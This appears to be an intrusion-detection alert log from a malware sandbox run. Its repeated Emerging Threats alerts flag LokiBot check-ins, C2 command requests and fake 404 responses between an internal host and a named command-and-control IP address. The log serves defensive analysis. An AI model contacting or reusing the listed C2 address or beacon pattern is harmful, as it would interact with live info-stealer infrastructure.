                                                                                    2025-01-07T12:33:01.502409+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449843TCP
                                                                                    2025-01-07T12:33:01.662274+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44984994.156.177.4180TCP
                                                                                    2025-01-07T12:33:01.662274+01002025381ET MALWARE LokiBot Checkin1192.168.2.44984994.156.177.4180TCP
                                                                                    2025-01-07T12:33:01.662274+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44984994.156.177.4180TCP
                                                                                    2025-01-07T12:33:02.396007+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44984994.156.177.4180TCP
                                                                                    2025-01-07T12:33:02.396007+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44984994.156.177.4180TCP
                                                                                    2025-01-07T12:33:02.400864+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449849TCP
                                                                                    2025-01-07T12:33:02.549471+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44985794.156.177.4180TCP
                                                                                    2025-01-07T12:33:02.549471+01002025381ET MALWARE LokiBot Checkin1192.168.2.44985794.156.177.4180TCP
                                                                                    2025-01-07T12:33:02.549471+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44985794.156.177.4180TCP
                                                                                    2025-01-07T12:33:03.285971+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44985794.156.177.4180TCP
                                                                                    2025-01-07T12:33:03.285971+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44985794.156.177.4180TCP
                                                                                    2025-01-07T12:33:03.290840+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449857TCP
                                                                                    2025-01-07T12:33:03.476176+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44986394.156.177.4180TCP
                                                                                    2025-01-07T12:33:03.476176+01002025381ET MALWARE LokiBot Checkin1192.168.2.44986394.156.177.4180TCP
                                                                                    2025-01-07T12:33:03.476176+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44986394.156.177.4180TCP
                                                                                    2025-01-07T12:33:04.228379+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44986394.156.177.4180TCP
                                                                                    2025-01-07T12:33:04.228379+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44986394.156.177.4180TCP
                                                                                    2025-01-07T12:33:04.233933+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449863TCP
                                                                                    2025-01-07T12:33:04.420628+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44986994.156.177.4180TCP
                                                                                    2025-01-07T12:33:04.420628+01002025381ET MALWARE LokiBot Checkin1192.168.2.44986994.156.177.4180TCP
                                                                                    2025-01-07T12:33:04.420628+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44986994.156.177.4180TCP
                                                                                    2025-01-07T12:33:05.135088+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44986994.156.177.4180TCP
                                                                                    2025-01-07T12:33:05.135088+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44986994.156.177.4180TCP
                                                                                    2025-01-07T12:33:05.139877+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449869TCP
                                                                                    2025-01-07T12:33:05.289917+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44987594.156.177.4180TCP
                                                                                    2025-01-07T12:33:05.289917+01002025381ET MALWARE LokiBot Checkin1192.168.2.44987594.156.177.4180TCP
                                                                                    2025-01-07T12:33:05.289917+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44987594.156.177.4180TCP
                                                                                    2025-01-07T12:33:06.011427+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44987594.156.177.4180TCP
                                                                                    2025-01-07T12:33:06.011427+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44987594.156.177.4180TCP
                                                                                    2025-01-07T12:33:06.016218+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449875TCP
                                                                                    2025-01-07T12:33:06.157706+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44988294.156.177.4180TCP
                                                                                    2025-01-07T12:33:06.157706+01002025381ET MALWARE LokiBot Checkin1192.168.2.44988294.156.177.4180TCP
                                                                                    2025-01-07T12:33:06.157706+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44988294.156.177.4180TCP
                                                                                    2025-01-07T12:33:06.894211+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44988294.156.177.4180TCP
                                                                                    2025-01-07T12:33:06.894211+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44988294.156.177.4180TCP
                                                                                    2025-01-07T12:33:06.899543+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449882TCP
                                                                                    2025-01-07T12:33:07.168337+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44988894.156.177.4180TCP
                                                                                    2025-01-07T12:33:07.168337+01002025381ET MALWARE LokiBot Checkin1192.168.2.44988894.156.177.4180TCP
                                                                                    2025-01-07T12:33:07.168337+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44988894.156.177.4180TCP
                                                                                    2025-01-07T12:33:07.922188+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44988894.156.177.4180TCP
                                                                                    2025-01-07T12:33:07.922188+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44988894.156.177.4180TCP
                                                                                    2025-01-07T12:33:07.927128+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449888TCP
                                                                                    2025-01-07T12:33:08.065316+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44989894.156.177.4180TCP
                                                                                    2025-01-07T12:33:08.065316+01002025381ET MALWARE LokiBot Checkin1192.168.2.44989894.156.177.4180TCP
                                                                                    2025-01-07T12:33:08.065316+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44989894.156.177.4180TCP
                                                                                    2025-01-07T12:33:08.808854+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44989894.156.177.4180TCP
                                                                                    2025-01-07T12:33:08.808854+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44989894.156.177.4180TCP
                                                                                    2025-01-07T12:33:08.813925+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449898TCP
                                                                                    2025-01-07T12:33:08.983613+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44990494.156.177.4180TCP
                                                                                    2025-01-07T12:33:08.983613+01002025381ET MALWARE LokiBot Checkin1192.168.2.44990494.156.177.4180TCP
                                                                                    2025-01-07T12:33:08.983613+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44990494.156.177.4180TCP
                                                                                    2025-01-07T12:33:09.719346+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44990494.156.177.4180TCP
                                                                                    2025-01-07T12:33:09.719346+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44990494.156.177.4180TCP
                                                                                    2025-01-07T12:33:09.729144+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449904TCP
                                                                                    2025-01-07T12:33:10.036766+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44991094.156.177.4180TCP
                                                                                    2025-01-07T12:33:10.036766+01002025381ET MALWARE LokiBot Checkin1192.168.2.44991094.156.177.4180TCP
                                                                                    2025-01-07T12:33:10.036766+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44991094.156.177.4180TCP
                                                                                    2025-01-07T12:33:10.771269+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44991094.156.177.4180TCP
                                                                                    2025-01-07T12:33:10.771269+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44991094.156.177.4180TCP
                                                                                    2025-01-07T12:33:10.776074+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449910TCP
                                                                                    2025-01-07T12:33:10.925247+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44991894.156.177.4180TCP
                                                                                    2025-01-07T12:33:10.925247+01002025381ET MALWARE LokiBot Checkin1192.168.2.44991894.156.177.4180TCP
                                                                                    2025-01-07T12:33:10.925247+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44991894.156.177.4180TCP
                                                                                    2025-01-07T12:33:11.659311+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44991894.156.177.4180TCP
                                                                                    2025-01-07T12:33:11.659311+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44991894.156.177.4180TCP
                                                                                    2025-01-07T12:33:11.664061+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449918TCP
                                                                                    2025-01-07T12:33:11.841098+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44992794.156.177.4180TCP
                                                                                    2025-01-07T12:33:11.841098+01002025381ET MALWARE LokiBot Checkin1192.168.2.44992794.156.177.4180TCP
                                                                                    2025-01-07T12:33:11.841098+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44992794.156.177.4180TCP
                                                                                    2025-01-07T12:33:12.593371+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44992794.156.177.4180TCP
                                                                                    2025-01-07T12:33:12.593371+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44992794.156.177.4180TCP
                                                                                    2025-01-07T12:33:12.599063+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449927TCP
                                                                                    2025-01-07T12:33:12.953872+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44993394.156.177.4180TCP
                                                                                    2025-01-07T12:33:12.953872+01002025381ET MALWARE LokiBot Checkin1192.168.2.44993394.156.177.4180TCP
                                                                                    2025-01-07T12:33:12.953872+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44993394.156.177.4180TCP
                                                                                    2025-01-07T12:33:13.817700+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44993394.156.177.4180TCP
                                                                                    2025-01-07T12:33:13.817700+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44993394.156.177.4180TCP
                                                                                    2025-01-07T12:33:13.822457+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449933TCP
                                                                                    2025-01-07T12:33:13.973579+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44994194.156.177.4180TCP
                                                                                    2025-01-07T12:33:13.973579+01002025381ET MALWARE LokiBot Checkin1192.168.2.44994194.156.177.4180TCP
                                                                                    2025-01-07T12:33:13.973579+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44994194.156.177.4180TCP
                                                                                    2025-01-07T12:33:14.698696+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44994194.156.177.4180TCP
                                                                                    2025-01-07T12:33:14.698696+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44994194.156.177.4180TCP
                                                                                    2025-01-07T12:33:14.703463+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449941TCP
                                                                                    2025-01-07T12:33:14.849018+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44995094.156.177.4180TCP
                                                                                    2025-01-07T12:33:14.849018+01002025381ET MALWARE LokiBot Checkin1192.168.2.44995094.156.177.4180TCP
                                                                                    2025-01-07T12:33:14.849018+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44995094.156.177.4180TCP
                                                                                    2025-01-07T12:33:15.583031+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44995094.156.177.4180TCP
                                                                                    2025-01-07T12:33:15.583031+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44995094.156.177.4180TCP
                                                                                    2025-01-07T12:33:15.589754+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449950TCP
                                                                                    2025-01-07T12:33:15.804831+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44995694.156.177.4180TCP
                                                                                    2025-01-07T12:33:15.804831+01002025381ET MALWARE LokiBot Checkin1192.168.2.44995694.156.177.4180TCP
                                                                                    2025-01-07T12:33:15.804831+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44995694.156.177.4180TCP
                                                                                    2025-01-07T12:33:16.529723+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44995694.156.177.4180TCP
                                                                                    2025-01-07T12:33:16.529723+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44995694.156.177.4180TCP
                                                                                    2025-01-07T12:33:16.534583+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449956TCP
                                                                                    2025-01-07T12:33:16.682925+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44996294.156.177.4180TCP
                                                                                    2025-01-07T12:33:16.682925+01002025381ET MALWARE LokiBot Checkin1192.168.2.44996294.156.177.4180TCP
                                                                                    2025-01-07T12:33:16.682925+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44996294.156.177.4180TCP
                                                                                    2025-01-07T12:33:17.415506+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44996294.156.177.4180TCP
                                                                                    2025-01-07T12:33:17.415506+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44996294.156.177.4180TCP
                                                                                    2025-01-07T12:33:17.420281+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449962TCP
                                                                                    2025-01-07T12:33:17.566164+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44996894.156.177.4180TCP
                                                                                    2025-01-07T12:33:17.566164+01002025381ET MALWARE LokiBot Checkin1192.168.2.44996894.156.177.4180TCP
                                                                                    2025-01-07T12:33:17.566164+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44996894.156.177.4180TCP
                                                                                    2025-01-07T12:33:18.317821+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44996894.156.177.4180TCP
                                                                                    2025-01-07T12:33:18.317821+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44996894.156.177.4180TCP
                                                                                    2025-01-07T12:33:18.323422+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449968TCP
                                                                                    2025-01-07T12:33:18.615544+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44997494.156.177.4180TCP
                                                                                    2025-01-07T12:33:18.615544+01002025381ET MALWARE LokiBot Checkin1192.168.2.44997494.156.177.4180TCP
                                                                                    2025-01-07T12:33:18.615544+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44997494.156.177.4180TCP
                                                                                    2025-01-07T12:33:19.383367+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44997494.156.177.4180TCP
                                                                                    2025-01-07T12:33:19.383367+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44997494.156.177.4180TCP
                                                                                    2025-01-07T12:33:19.388466+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449974TCP
                                                                                    2025-01-07T12:33:19.538604+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44998594.156.177.4180TCP
                                                                                    2025-01-07T12:33:19.538604+01002025381ET MALWARE LokiBot Checkin1192.168.2.44998594.156.177.4180TCP
                                                                                    2025-01-07T12:33:19.538604+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44998594.156.177.4180TCP
                                                                                    2025-01-07T12:33:20.262019+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44998594.156.177.4180TCP
                                                                                    2025-01-07T12:33:20.262019+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44998594.156.177.4180TCP
                                                                                    2025-01-07T12:33:20.267460+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449985TCP
                                                                                    2025-01-07T12:33:20.414906+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44999194.156.177.4180TCP
                                                                                    2025-01-07T12:33:20.414906+01002025381ET MALWARE LokiBot Checkin1192.168.2.44999194.156.177.4180TCP
                                                                                    2025-01-07T12:33:20.414906+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44999194.156.177.4180TCP
                                                                                    2025-01-07T12:33:21.160919+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44999194.156.177.4180TCP
                                                                                    2025-01-07T12:33:21.160919+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44999194.156.177.4180TCP
                                                                                    2025-01-07T12:33:21.183793+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449991TCP
                                                                                    2025-01-07T12:33:21.330905+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44999794.156.177.4180TCP
                                                                                    2025-01-07T12:33:21.330905+01002025381ET MALWARE LokiBot Checkin1192.168.2.44999794.156.177.4180TCP
                                                                                    2025-01-07T12:33:21.330905+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44999794.156.177.4180TCP
                                                                                    2025-01-07T12:33:22.097407+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44999794.156.177.4180TCP
                                                                                    2025-01-07T12:33:22.097407+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44999794.156.177.4180TCP
                                                                                    2025-01-07T12:33:22.102226+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449997TCP
                                                                                    2025-01-07T12:33:22.254058+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45000394.156.177.4180TCP
                                                                                    2025-01-07T12:33:22.254058+01002025381ET MALWARE LokiBot Checkin1192.168.2.45000394.156.177.4180TCP
                                                                                    2025-01-07T12:33:22.254058+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45000394.156.177.4180TCP
                                                                                    2025-01-07T12:33:22.988429+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45000394.156.177.4180TCP
                                                                                    2025-01-07T12:33:22.988429+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45000394.156.177.4180TCP
                                                                                    2025-01-07T12:33:22.993264+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450003TCP
                                                                                    2025-01-07T12:33:23.161672+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45001094.156.177.4180TCP
                                                                                    2025-01-07T12:33:23.161672+01002025381ET MALWARE LokiBot Checkin1192.168.2.45001094.156.177.4180TCP
                                                                                    2025-01-07T12:33:23.161672+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45001094.156.177.4180TCP
                                                                                    2025-01-07T12:33:23.905645+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45001094.156.177.4180TCP
                                                                                    2025-01-07T12:33:23.905645+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45001094.156.177.4180TCP
                                                                                    2025-01-07T12:33:23.910512+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450010TCP
                                                                                    2025-01-07T12:33:24.052352+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45001994.156.177.4180TCP
                                                                                    2025-01-07T12:33:24.052352+01002025381ET MALWARE LokiBot Checkin1192.168.2.45001994.156.177.4180TCP
                                                                                    2025-01-07T12:33:24.052352+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45001994.156.177.4180TCP
                                                                                    2025-01-07T12:33:24.785850+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45001994.156.177.4180TCP
                                                                                    2025-01-07T12:33:24.785850+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45001994.156.177.4180TCP
                                                                                    2025-01-07T12:33:24.790680+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450019TCP
                                                                                    2025-01-07T12:33:24.970591+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45002694.156.177.4180TCP
                                                                                    2025-01-07T12:33:24.970591+01002025381ET MALWARE LokiBot Checkin1192.168.2.45002694.156.177.4180TCP
                                                                                    2025-01-07T12:33:24.970591+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45002694.156.177.4180TCP
                                                                                    2025-01-07T12:33:25.726265+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45002694.156.177.4180TCP
                                                                                    2025-01-07T12:33:25.726265+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45002694.156.177.4180TCP
                                                                                    2025-01-07T12:33:25.731038+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450026TCP
                                                                                    2025-01-07T12:33:25.885204+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45003294.156.177.4180TCP
                                                                                    2025-01-07T12:33:25.885204+01002025381ET MALWARE LokiBot Checkin1192.168.2.45003294.156.177.4180TCP
                                                                                    2025-01-07T12:33:25.885204+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45003294.156.177.4180TCP
                                                                                    2025-01-07T12:33:26.611215+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45003294.156.177.4180TCP
                                                                                    2025-01-07T12:33:26.611215+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45003294.156.177.4180TCP
                                                                                    2025-01-07T12:33:26.615954+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450032TCP
                                                                                    2025-01-07T12:33:26.771343+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45003894.156.177.4180TCP
                                                                                    2025-01-07T12:33:26.771343+01002025381ET MALWARE LokiBot Checkin1192.168.2.45003894.156.177.4180TCP
                                                                                    2025-01-07T12:33:26.771343+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45003894.156.177.4180TCP
                                                                                    2025-01-07T12:33:27.495067+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45003894.156.177.4180TCP
                                                                                    2025-01-07T12:33:27.495067+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45003894.156.177.4180TCP
                                                                                    2025-01-07T12:33:27.509460+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450038TCP
                                                                                    2025-01-07T12:33:27.680964+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45004594.156.177.4180TCP
                                                                                    2025-01-07T12:33:27.680964+01002025381ET MALWARE LokiBot Checkin1192.168.2.45004594.156.177.4180TCP
                                                                                    2025-01-07T12:33:27.680964+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45004594.156.177.4180TCP
                                                                                    2025-01-07T12:33:28.406726+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45004594.156.177.4180TCP
                                                                                    2025-01-07T12:33:28.406726+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45004594.156.177.4180TCP
                                                                                    2025-01-07T12:33:28.411500+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450045TCP
                                                                                    2025-01-07T12:33:28.568840+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45005494.156.177.4180TCP
                                                                                    2025-01-07T12:33:28.568840+01002025381ET MALWARE LokiBot Checkin1192.168.2.45005494.156.177.4180TCP
                                                                                    2025-01-07T12:33:28.568840+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45005494.156.177.4180TCP
                                                                                    2025-01-07T12:33:29.321667+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45005494.156.177.4180TCP
                                                                                    2025-01-07T12:33:29.321667+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45005494.156.177.4180TCP
                                                                                    2025-01-07T12:33:29.326539+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450054TCP
                                                                                    2025-01-07T12:33:29.482591+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45006094.156.177.4180TCP
                                                                                    2025-01-07T12:33:29.482591+01002025381ET MALWARE LokiBot Checkin1192.168.2.45006094.156.177.4180TCP
                                                                                    2025-01-07T12:33:29.482591+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45006094.156.177.4180TCP
                                                                                    2025-01-07T12:33:30.200229+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45006094.156.177.4180TCP
                                                                                    2025-01-07T12:33:30.200229+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45006094.156.177.4180TCP
                                                                                    2025-01-07T12:33:30.205109+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450060TCP
                                                                                    2025-01-07T12:33:30.418199+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45006794.156.177.4180TCP
                                                                                    2025-01-07T12:33:30.418199+01002025381ET MALWARE LokiBot Checkin1192.168.2.45006794.156.177.4180TCP
                                                                                    2025-01-07T12:33:30.418199+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45006794.156.177.4180TCP
                                                                                    2025-01-07T12:33:31.133820+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45006794.156.177.4180TCP
                                                                                    2025-01-07T12:33:31.133820+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45006794.156.177.4180TCP
                                                                                    2025-01-07T12:33:31.138590+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450067TCP
                                                                                    2025-01-07T12:33:31.283218+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45007394.156.177.4180TCP
                                                                                    2025-01-07T12:33:31.283218+01002025381ET MALWARE LokiBot Checkin1192.168.2.45007394.156.177.4180TCP
                                                                                    2025-01-07T12:33:31.283218+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45007394.156.177.4180TCP
                                                                                    2025-01-07T12:33:32.021373+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45007394.156.177.4180TCP
                                                                                    2025-01-07T12:33:32.021373+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45007394.156.177.4180TCP
                                                                                    2025-01-07T12:33:32.026118+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450073TCP
                                                                                    2025-01-07T12:33:32.183439+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45007994.156.177.4180TCP
                                                                                    2025-01-07T12:33:32.183439+01002025381ET MALWARE LokiBot Checkin1192.168.2.45007994.156.177.4180TCP
                                                                                    2025-01-07T12:33:32.183439+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45007994.156.177.4180TCP
                                                                                    2025-01-07T12:33:32.920405+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45007994.156.177.4180TCP
                                                                                    2025-01-07T12:33:32.920405+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45007994.156.177.4180TCP
                                                                                    2025-01-07T12:33:32.925198+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450079TCP
                                                                                    2025-01-07T12:33:33.064766+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45008694.156.177.4180TCP
                                                                                    2025-01-07T12:33:33.064766+01002025381ET MALWARE LokiBot Checkin1192.168.2.45008694.156.177.4180TCP
                                                                                    2025-01-07T12:33:33.064766+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45008694.156.177.4180TCP
                                                                                    2025-01-07T12:33:33.838131+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45008694.156.177.4180TCP
                                                                                    2025-01-07T12:33:33.838131+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45008694.156.177.4180TCP
                                                                                    2025-01-07T12:33:33.842894+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450086TCP
                                                                                    2025-01-07T12:33:33.993234+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45009494.156.177.4180TCP
                                                                                    2025-01-07T12:33:33.993234+01002025381ET MALWARE LokiBot Checkin1192.168.2.45009494.156.177.4180TCP
                                                                                    2025-01-07T12:33:33.993234+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45009494.156.177.4180TCP
                                                                                    2025-01-07T12:33:34.750375+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45009494.156.177.4180TCP
                                                                                    2025-01-07T12:33:34.750375+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45009494.156.177.4180TCP
                                                                                    2025-01-07T12:33:34.755137+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450094TCP
